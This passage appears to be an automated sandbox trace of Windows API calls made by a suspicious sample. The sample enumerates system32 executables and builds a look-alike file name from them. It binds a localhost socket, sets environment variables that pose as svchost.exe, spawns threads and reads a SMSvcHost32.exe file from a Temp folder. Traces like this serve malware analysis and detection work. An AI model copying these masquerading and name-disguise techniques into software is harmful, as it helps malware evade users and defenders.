	[0088.062] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.062] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.062] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.062] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.062] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.062] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.062] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.062] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.062] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.062] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.062] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.062] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.062] StrRChrW (lpStart="PATHPING.EXE", lpEnd=0x0, wMatch=0x2e) returned=".EXE"
	[0088.062] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.062] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.062] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.062] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.062] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.062] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.062] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.062] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.062] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.062] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.062] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.062] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.062] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.062] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.062] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.062] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.062] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.062] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.062] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.062] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.062] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.063] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.063] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.063] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.063] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.063] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.063] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.063] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.063] StrRChrW (lpStart="regini.exe", lpEnd=0x0, wMatch=0x2e) returned=".exe"
	[0088.063] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.063] FindClose (in: hFindFile=0x6536f8 | out: hFindFile=0x6536f8) returned 1
	[0088.063] GetSystemDirectoryW (in: lpBuffer=0x65b070, uSize=0xfd | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0088.063] lstrcatW (in: lpString1="C:\\Windows\\system32", lpString2="\\*.exe" | out: lpString1="C:\\Windows\\system32\\*.exe") returned="C:\\Windows\\system32\\*.exe"
	[0088.063] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\*.exe", lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 0x653638
	[0088.063] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.063] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.063] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.063] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.063] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.063] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.063] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.063] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.063] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.063] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.063] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.063] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.063] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.063] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.063] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.063] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.063] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.063] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.063] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.063] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.063] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.063] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.063] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.063] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.063] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.063] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.063] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.063] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.064] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.064] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.064] StrRChrW (lpStart="CloudNotifications.exe", lpEnd=0x0, wMatch=0x2e) returned=".exe"
	[0088.064] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.064] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.064] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.064] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.064] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.064] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.064] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.064] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.064] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.064] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.064] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.064] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.064] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.064] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.064] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.064] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.064] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.064] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.064] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.064] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.064] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.064] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.064] StrRChrW (lpStart="fsquirt.exe", lpEnd=0x0, wMatch=0x2e) returned=".exe"
	[0088.065] GetSystemDirectoryW (in: lpBuffer=0x65b070, uSize=0xfd | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0088.065] lstrcatW (in: lpString1="C:\\Windows\\system32", lpString2="\\*.exe" | out: lpString1="C:\\Windows\\system32\\*.exe") returned="C:\\Windows\\system32\\*.exe"
	[0088.065] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\*.exe", lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 0x6539b8
	[0088.065] StrRChrW (lpStart="gpscript.exe", lpEnd=0x0, wMatch=0x2e) returned=".exe"
	[0088.066] StrRChrW (lpStart="sdchange.exe", lpEnd=0x0, wMatch=0x2e) returned=".exe"
	[0088.066] GetSystemDirectoryW (in: lpBuffer=0x65b070, uSize=0xfd | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0088.066] lstrcatW (in: lpString1="C:\\Windows\\system32", lpString2="\\*.exe" | out: lpString1="C:\\Windows\\system32\\*.exe") returned="C:\\Windows\\system32\\*.exe"
	[0088.066] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\*.exe", lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 0x6539b8
	[0088.066] StrRChrW (lpStart="BackgroundTransferHost.exe", lpEnd=0x0, wMatch=0x2e) returned=".exe"
	[0088.066] StrRChrW (lpStart="cliconfg.exe", lpEnd=0x0, wMatch=0x2e) returned=".exe"
	[0088.066] lstrcatW (in: lpString1="Cloufsq", lpString2=".exe" | out: lpString1="Cloufsq.exe") returned="Cloufsq.exe"
	[0088.066] GetSystemDirectoryW (in: lpBuffer=0x65b070, uSize=0xfd | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0088.066] lstrcatW (in: lpString1="C:\\Windows\\system32", lpString2="\\*.exe" | out: lpString1="C:\\Windows\\system32\\*.exe") returned="C:\\Windows\\system32\\*.exe"
	[0088.066] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\*.exe", lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 0x653678
	[0088.067] StrRChrW (lpStart="control.exe", lpEnd=0x0, wMatch=0x2e) returned=".exe"
	[0088.067] StrRChrW (lpStart="RmClient.exe", lpEnd=0x0, wMatch=0x2e) returned=".exe"
	[0088.067] GetSystemDirectoryW (in: lpBuffer=0x65b070, uSize=0xfd | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0088.067] lstrcatW (in: lpString1="C:\\Windows\\system32", lpString2="\\*.exe" | out: lpString1="C:\\Windows\\system32\\*.exe") returned="C:\\Windows\\system32\\*.exe"
	[0088.067] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\*.exe", lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 0x6538f8
	[0088.068] StrRChrW (lpStart="EaseOfAccessDialog.exe", lpEnd=0x0, wMatch=0x2e) returned=".exe"
	[0088.068] StrRChrW (lpStart="EhStorAuthn.exe", lpEnd=0x0, wMatch=0x2e) returned=".exe"
	[0088.068] ConvertStringSecurityDescriptorToSecurityDescriptorA () returned 0x1
	[0088.069] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x262f934 | out: lpWSAData=0x262f934) returned 0
	[0088.073] socket (af=2, type=1, protocol=0) returned 0x230
	[0088.077] GetCurrentProcessId () returned 0x934
	[0088.077] inet_addr (cp="127.0.0.1") returned 0x100007f
	[0088.077] htons (hostshort=0x1104) returned 0x411
	[0088.077] bind (s=0x230, addr=0x262fac4*(sa_family=2, sin_port=0x1104, sin_addr="127.0.0.1"), namelen=16) returned 0
	[0088.078] closesocket (s=0x230) returned 0
	[0088.078] wsprintfA (in: param_1=0x262fd50, param_2="%s_%d" | out: param_1="exe_scheduler_3007") returned 18
	[0088.078] wsprintfA (in: param_1=0x262fd10, param_2="%d" | out: param_1="6000") returned 4
	[0088.078] SetEnvironmentVariableA (lpName="standalonemtm", lpValue="true") returned 1
	[0088.078] SetEnvironmentVariableA (lpName="vendor_id", lpValue="exe_scheduler_3007") returned 1
	[0088.078] SetEnvironmentVariableA (lpName="mainprocessoverride", lpValue="svchost.exe") returned 1
	[0088.078] SetEnvironmentVariableA (lpName="RandomListenPortBase", lpValue="6000") returned 1
	[0088.078] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x409320, lpParameter=0x6586e8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x230
	[0088.093] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x406990, lpParameter=0x64fd70, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x234
	[0088.093] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x414cb0, lpParameter=0x64fd70, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x238
	[0088.094] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x421ae0, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x23c
	[0088.094] CloseHandle (hObject=0x23c) returned 1

Thread:
	id = 100
	os_tid = 0xdd8

	[0087.996] Sleep (dwMilliseconds=0xc350) 
	[0098.067] GetLastError () returned 0x57
	[0098.067] GetLastError () returned 0x57
	[0098.067] GetLastError () returned 0x57
	[0098.067] GetLastError () returned 0x57
	[0098.067] GetLastError () returned 0x57
	[0098.067] GetLastError () returned 0x57
	[0098.067] GetLastError () returned 0x57
	[0098.067] GetLastError () returned 0x57
	[0098.067] GetLastError () returned 0x57
	[0098.067] GetLastError () returned 0x57
	[0098.067] GetLastError () returned 0x57
	[0098.068] GetLastError () returned 0x57
	[0098.068] OutputDebugStringA (lpOutputString="OGG 0") 

Thread:
	id = 101
	os_tid = 0xedc

	[0088.080] CreateFileW (lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\smsvchost32.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x234
	[0088.080] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.080] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.080] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.080] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.080] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.080] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.080] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.080] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.080] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.080] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.081] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.081] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.081] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.081] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.081] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.081] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.081] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.081] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.081] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.081] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.081] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.081] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.081] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.081] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.081] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.081] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.081] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.081] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.081] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.081] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.081] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.081] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.081] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.081] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
